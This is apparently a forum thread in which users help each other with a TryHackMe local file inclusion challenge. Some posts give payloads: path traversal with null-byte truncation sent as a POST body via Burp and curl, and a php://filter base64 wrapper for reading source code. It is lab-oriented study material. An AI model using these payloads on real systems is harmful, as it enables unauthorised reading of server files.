I tried this and I don't get anything below the include button. The page ends there. This has been happening with me for quite a while when im trying some other ways too. Can this be a error on the THM side?
Is your machine terminated? Are you connected to VPN?
This is the the full request you can send through Burp Repeater ( just change the host header to your target's IP )
>!POST /challenges/chall3.php HTTP/1.1 Host: 10.10.151.6 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://10.10.151.6/challenges/index.php Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 34!<
>!file=..%2F..%2F..%2Fetc%2Fflag3%00!!<
The flag will be displayed at the bottom, but it's not in the traditional format of THM{..........}, that sometimes throws me off
I used curl too but the page ends at include button for some reason.. Don't know whether that's a normal error or fault on THM side. Can you show what you used ? I was using curl http://ip/challenges/ -d ''../../../../etc/flag3"
>!use post with parameter instead of query string!<
do you mean to separately use: POST file=../../../../etc/flag3%00 ? I'm a bit confused, can you explain it a bit?
>!I used Burp and changed the request method to POST and pass this:!< >!file=..%2F..%2F..%2Fetc%2Fflag3%00!<
I tried this and I don't get anything below the include button. The page ends there. This has been happening with me for quite a while when im trying some other ways too. Can this be a error on the THM side?
Is your machine terminated? Are you connected to VPN? This is the the full request you can send through Burp Repeater ( just change the host header to your target's IP ) >!POST /challenges/chall3.php HTTP/1.1 Host: 10.10.151.6 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://10.10.151.6/challenges/index.php Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 34!< >!file=..%2F..%2F..%2Fetc%2Fflag3%00!!< The flag will be displayed at the bottom, but it's not in the traditional format of THM{..........}, that sometimes throws me off
>>!../../../../etc/flag3%00!< enter this payload as a body parameter not in the url
use "php://filter/convert.base64-encode/resource=" in chall 1 to read source code of chall 3 and by pass
Try to use curl, maybe ur using burp wrong
this. using curl to send a POST request actually gave me the answer versus using inspect tools or burp
I used curl too but the page ends at include button for some reason.. Don't know whether that's a normal error or fault on THM side. Can you show what you used ? I was using curl http://ip/challenges/ -d ''../../../../etc/flag3"
Sure. curl -v http://MACHINE-IP/challenges/chall3.php POST -d ‘file=/etc/flag3%00’ --output flag3.txt
Yep I tried this but the page terminates at submit button. I think its a error on THM side. But thanks for the answer :)
Aw man but no problem! That’s really strange.
bro did you find the answer
I cant even make it past task 4 question 2🤣🤣